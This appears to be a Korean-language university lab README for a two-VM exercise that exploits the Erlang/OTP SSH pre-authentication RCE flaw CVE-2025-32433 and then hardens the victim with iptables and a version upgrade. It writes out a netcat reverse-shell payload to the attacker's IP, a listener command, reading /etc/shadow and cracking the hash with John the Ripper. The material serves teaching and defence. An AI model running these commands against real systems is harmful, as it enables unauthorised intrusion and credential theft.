
이 프로젝트는 두 대의 가상 머신을 사용하여 실제 공격 및 방어 시나리오를 시뮬레이션합니다. Erlang/OTP SSH 서버의 중요한 사전 인증 RCE 취약점(CVE-2025-32433)을 악용하고, 추출된 비밀번호 해시를 크랙한 후, 방화벽 규칙과 패치를 통해 피해 머신을 강화하게 됩니다.
총점: 20 | 마감일: 지연 제출 불가
이 프로젝트는 두 대의 가상 머신을 대상으로 한 실제 공격 및 방어 시나리오를 시뮬레이션합니다. Erlang/OTP SSH 서버의 중요한 사전 인증 RCE 취약점(CVE-2025-32433)을 악용하고, 추출된 암호 해시를 크래킹한 후 방화벽 규칙과 패치를 통해 피해 시스템을 강화합니다.
| 역할 | OS |
|---|---|
| 공격자 | Kali Linux |
| 피해자 | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| 파일 | 설명 |
|---|---|
Debian-1.ova | 사전 구축된 피해자 VM 이미지 — 별도 다운로드 필요, 자료 참조 (GitHub에 올리기엔 너무 큼) |
Project Spring 2026 - Google Docs.pdf |
Debian-1.ova): 다운로드 링크 — GitHub에 호스팅하기엔 너무 큼(~3GB). 아래 설명에 따라 별도 다운로드하여 VirtualBox/VMware로 가져오십시오.rockyou_txt.txt): 이 저장소에 포함되어 있으며, 2부의 암호 크래킹 단계에서 사용됩니다.Debian-1.ova와 Kali Linux VM을 VirtualBox/VMware로 로드합니다.ifconfig를 실행하여 IP를 확인합니다(일반적으로 192.168.56.0/24 대역).nmap -p 2222 -sV -A <victim-IP>
열린 포트, 서비스 버전 및 Erlang 시그니처를 문서화합니다.
일시적으로 Kali를 NAT로 전환하여 저장소를 클론한 후, 다시 Host-Only로 전환합니다.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
스크립트 편집 — HOST = "<victim-IP>"를 설정하고 페이로드 업데이트:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
터미널 1 (Kali) — 리스너 시작:
nc -lvnp 4444
터미널 2 (Kali) — 익스플로잇 실행:
python3 CVE-2025-32433.py
리버스 셸에서 whoami와 hostname을 실행하여 액세스를 확인합니다.
# 피해자에서 (리버스 셸을 통해)
cat /etc/shadow | grep testuser > hash.txt
# Kali에서
john --wordlist=rockyou_txt.txt hash.txt
해시 형식(예: $6$ = SHA-512), 소요 시간, 복구된 평문 암호를 문서화합니다.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Kali에서 Nmap 스캔과 익스플로잇을 다시 실행 — 포트 2222가 이제 "Filtered" 상태이며 익스플로잇이 실패하는 것을 문서화합니다.
Erlang/OTP를 v27.3.3 이상으로 업그레이드하는 단계를 문서화합니다. 이 버전에는 CVE-2025-32433에 대한 수정 사항이 포함되어 있습니다.
whoami/hostname), 플래그 캡처에 대한 스크린샷이 포함된 전체 보고서CVE-2025-32433 — Erlang/OTP SSH 서버의 중요한 사전 인증 원격 코드 실행. 자격 증명 교환 전에 변조된 SSH 패킷을 전송하여 악용 가능하며, 인증되지 않은 공격자에게 완전한 셸 액세스를 제공합니다.
| 전체 프로젝트 지침 및 산출물 포함 |
rockyou_txt.txt | John the Ripper와 함께 사용하여 추출된 암호 해시를 크래킹하는 단어 목록 |